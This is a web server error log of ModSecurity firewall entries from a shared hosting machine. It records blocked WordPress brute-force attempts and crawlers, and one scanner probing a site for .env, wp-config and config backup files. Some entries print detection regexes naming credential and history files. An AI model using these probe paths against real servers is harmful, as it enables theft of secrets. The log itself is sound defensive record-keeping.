[Tue May 26 14:13:03.601369 2026] [security2:error] [pid 598542:tid 598572] [remote 172.104.164.56:34186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4YwAAPh0"]
[Tue May 26 14:13:04.413192 2026] [security2:error] [pid 598542:tid 598791] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdF_4iWyZxnXeAW3I4bwAAAHc"]
[Tue May 26 14:13:06.422395 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdGv4iWyZxnXeAW3I4pQAAADI"]
[Tue May 26 14:13:08.023527 2026] [security2:error] [pid 598542:tid 598788] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdG_4iWyZxnXeAW3I47gAAAHQ"], referer: https://www.anujtradingco.com/
[Tue May 26 14:13:08.616849 2026] [security2:error] [pid 598542:tid 598778] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdHP4iWyZxnXeAW3I49gAAAGo"]
[Tue May 26 14:13:09.271387 2026] [security2:error] [pid 598542:tid 598742] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdHf4iWyZxnXeAW3I5EwAAAEY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 14:13:12.053599 2026] [security2:error] [pid 598542:tid 598774] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdH_4iWyZxnXeAW3I5dgAAAGY"]
[Tue May 26 14:13:13.154580 2026] [security2:error] [pid 598542:tid 598685] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIP4iWyZxnXeAW3I5sQAAAA0"]
[Tue May 26 14:13:13.443579 2026] [security2:error] [pid 598542:tid 598732] [client 89.221.206.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVdIf4iWyZxnXeAW3I5wAAAADw"], referer: https://anujtradingco.com
[Tue May 26 14:13:14.071770 2026] [security2:error] [pid 598542:tid 598751] [client 202.141.30.10:35469] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdIv4iWyZxnXeAW3I51wAAAE8"]
[Tue May 26 14:13:14.071887 2026] [security2:error] [pid 598542:tid 598751] [client 202.141.30.10:35469] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdIv4iWyZxnXeAW3I51wAAAE8"]
[Tue May 26 14:13:14.392524 2026] [security2:error] [pid 598542:tid 598769] [client 113.188.213.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIf4iWyZxnXeAW3I50gAAAGE"]
[Tue May 26 14:13:15.232885 2026] [security2:error] [pid 598542:tid 598688] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdIv4iWyZxnXeAW3I57gAAABA"]
[Tue May 26 14:13:17.594284 2026] [security2:error] [pid 598542:tid 598677] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdJf4iWyZxnXeAW3I6MQAAAAU"]
[Tue May 26 14:13:18.679423 2026] [security2:error] [pid 598542:tid 598702] [client 114.119.149.90:45961] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/"] [unique_id "ahVdJv4iWyZxnXeAW3I6WAAAAB4"], referer: http://www.ameritradeng.com/
[Tue May 26 14:13:18.749076 2026] [ssl:error] [pid 598542:tid 598700] [client 3.233.59.216:29353] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcalendars.masonicarkfoundation.in.svijaykumar.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:13:19.589317 2026] [ssl:error] [pid 598542:tid 598701] [client 54.86.115.253:21031] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpcontacts.dezkapro.com provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:13:20.257297 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdJ_4iWyZxnXeAW3I6fwAAADI"]
[Tue May 26 14:13:21.279573 2026] [security2:error] [pid 598542:tid 598712] [client 169.224.1.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVdJv4iWyZxnXeAW3I6YQAAACg"]
[Tue May 26 14:13:21.936992 2026] [security2:error] [pid 598542:tid 598735] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdKf4iWyZxnXeAW3I6wQAAAD8"]
[Tue May 26 14:13:22.770108 2026] [security2:error] [pid 598542:tid 598738] [client 23.229.29.76:35419] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVdKv4iWyZxnXeAW3I6ywAAAEI"], referer: https://www.cagmedya.com/web-tasarim-projelerinde-etkili-proje-yonetimi/
[Tue May 26 14:13:24.834844 2026] [security2:error] [pid 598542:tid 598697] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdLP4iWyZxnXeAW3I7CAAAABk"]
[Tue May 26 14:13:25.451124 2026] [security2:error] [pid 598542:tid 598738] [client 202.141.30.10:35552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7GwAAAEI"]
[Tue May 26 14:13:25.451244 2026] [security2:error] [pid 598542:tid 598738] [client 202.141.30.10:35552] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7GwAAAEI"]
[Tue May 26 14:13:25.857045 2026] [security2:error] [pid 598542:tid 598769] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVdLf4iWyZxnXeAW3I7HgAAABw"]
[Tue May 26 14:13:26.338897 2026] [security2:error] [pid 598542:tid 598724] [client 222.189.173.235:1452] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVdLv4iWyZxnXeAW3I7NQAAADQ"]
[Tue May 26 14:13:26.339013 2026] [security2:error] [pid 598542:tid 598724] [client 222.189.173.235:1452] ModSecurity: Warning. Matched phrase "Sogou web spider" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/robots.txt"] [unique_id "ahVdLv4iWyZxnXeAW3I7NQAAADQ"]
[Tue May 26 14:13:26.948315 2026] [security2:error] [pid 598542:tid 598677] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdLv4iWyZxnXeAW3I7QgAAAAU"]
[Tue May 26 14:13:27.301943 2026] [security2:error] [pid 598542:tid 598675] [client 185.251.19.115:37785] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ktmadvance-senegal.com"] [uri "/wp-login.php"] [unique_id "ahVdLv4iWyZxnXeAW3I7RwAAAAM"]
[Tue May 26 14:13:28.256294 2026] [security2:error] [pid 598542:tid 598679] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVdMP4iWyZxnXeAW3I7agAAAAc"]
[Tue May 26 14:13:29.247308 2026] [security2:error] [pid 598542:tid 598792] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdMP4iWyZxnXeAW3I7fAAAAHg"]
[Tue May 26 14:13:29.569443 2026] [security2:error] [pid 598542:tid 598742] [client 77.68.9.24:50894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/images/images/cache.php"] [unique_id "ahVdMf4iWyZxnXeAW3I7jAAAAEY"], referer: www.google.com
[Tue May 26 14:13:31.229680 2026] [security2:error] [pid 598542:tid 598788] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdMv4iWyZxnXeAW3I7tgAAAHQ"]
[Tue May 26 14:13:31.918423 2026] [security2:error] [pid 598542:tid 598743] [client 77.68.9.24:57952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/images/images/cache.php"] [unique_id "ahVdM_4iWyZxnXeAW3I7zwAAAEc"], referer: www.google.com
[Tue May 26 14:13:33.900293 2026] [security2:error] [pid 598542:tid 598729] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdNf4iWyZxnXeAW3I79gAAADk"]
[Tue May 26 14:13:35.105063 2026] [security2:error] [pid 598542:tid 598745] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdNv4iWyZxnXeAW3I8FwAAAEk"]
[Tue May 26 14:13:35.203102 2026] [security2:error] [pid 598542:tid 598773] [client 114.119.158.251:63367] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.onesoft.in"] [uri "/robots.txt"] [unique_id "ahVdN_4iWyZxnXeAW3I8KQAAAGU"]
[Tue May 26 14:13:36.217950 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8QAAAAGc"]
[Tue May 26 14:13:36.218089 2026] [security2:error] [pid 598542:tid 598775] [client 202.141.30.10:35361] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8QAAAAGc"]
[Tue May 26 14:13:36.989266 2026] [security2:error] [pid 598542:tid 598686] [client 75.108.148.190:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdOP4iWyZxnXeAW3I8TAAAAA4"]
[Tue May 26 14:13:38.206057 2026] [security2:error] [pid 598542:tid 598689] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdOf4iWyZxnXeAW3I8bgAAABE"]
[Tue May 26 14:13:40.170595 2026] [security2:error] [pid 598542:tid 598693] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdO_4iWyZxnXeAW3I8nQAAABU"]
[Tue May 26 14:13:40.989103 2026] [security2:error] [pid 598542:tid 598702] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env"] [unique_id "ahVdPP4iWyZxnXeAW3I8wQAAAB4"]
[Tue May 26 14:13:41.118965 2026] [security2:error] [pid 598542:tid 598774] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.bak"] [unique_id "ahVdPf4iWyZxnXeAW3I8ygAAAGY"]
[Tue May 26 14:13:41.518562 2026] [security2:error] [pid 598542:tid 598762] [client 45.148.10.62:33256] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/backend/.env"] [unique_id "ahVdPf4iWyZxnXeAW3I82gAAAFo"]
[Tue May 26 14:13:41.659254 2026] [security2:error] [pid 598542:tid 598794] [client 45.148.10.62:33256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVdPf4iWyZxnXeAW3I84gAAAHo"]
[Tue May 26 14:13:42.461649 2026] [security2:error] [pid 598542:tid 598775] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.backup"] [unique_id "ahVdPv4iWyZxnXeAW3I8-gAAAGc"]
[Tue May 26 14:13:42.481071 2026] [security2:error] [pid 598542:tid 598730] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdPv4iWyZxnXeAW3I87QAAADo"]
[Tue May 26 14:13:42.590419 2026] [security2:error] [pid 598542:tid 598790] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.orig"] [unique_id "ahVdPv4iWyZxnXeAW3I8_QAAAHY"]
[Tue May 26 14:13:42.718312 2026] [security2:error] [pid 598542:tid 598713] [client 45.148.10.62:33262] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.pronumbers.com.au"] [uri "/.env.old"] [unique_id "ahVdPv4iWyZxnXeAW3I9BgAAACk"]
[Tue May 26 14:13:42.987123 2026] [security2:error] [pid 598542:tid 598718] [client 45.148.10.62:33262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/.env.php.bak"] [unique_id "ahVdPv4iWyZxnXeAW3I9CwAAAC4"]
[Tue May 26 14:13:43.382212 2026] [security2:error] [pid 598542:tid 598782] [client 45.148.10.62:33270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVdP_4iWyZxnXeAW3I9FQAAAG4"]
[Tue May 26 14:13:44.203990 2026] [security2:error] [pid 598542:tid 598687] [client 114.119.139.251:55261] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/2/"] [unique_id "ahVdQP4iWyZxnXeAW3I9PwAAAA8"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2023-11-20&eventDisplay=past
[Tue May 26 14:13:44.606321 2026] [security2:error] [pid 598542:tid 598680] [client 45.148.10.62:33286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVdQP4iWyZxnXeAW3I9UQAAAAg"]
[Tue May 26 14:13:44.706882 2026] [security2:error] [pid 598542:tid 598786] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdQP4iWyZxnXeAW3I9RQAAAHI"]
[Tue May 26 14:13:45.088256 2026] [security2:error] [pid 598542:tid 598732] [client 45.148.10.62:33294] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVdQf4iWyZxnXeAW3I9YQAAADw"]
[Tue May 26 14:13:45.531552 2026] [security2:error] [pid 598542:tid 598734] [client 45.148.10.62:33304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVdQf4iWyZxnXeAW3I9cAAAAD4"]
[Tue May 26 14:13:45.928912 2026] [security2:error] [pid 598542:tid 598713] [client 45.148.10.62:33310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/config.php.bak"] [unique_id "ahVdQf4iWyZxnXeAW3I9egAAACk"]
[Tue May 26 14:13:46.712510 2026] [security2:error] [pid 598542:tid 598758] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdQv4iWyZxnXeAW3I9ggAAAFY"]
[Tue May 26 14:13:46.715411 2026] [security2:error] [pid 598542:tid 598746] [client 45.148.10.62:33314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVdQv4iWyZxnXeAW3I9lgAAAEo"]
[Tue May 26 14:13:47.310434 2026] [security2:error] [pid 598542:tid 598774] [client 202.141.30.10:65459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdQ_4iWyZxnXeAW3I9pAAAAGY"]
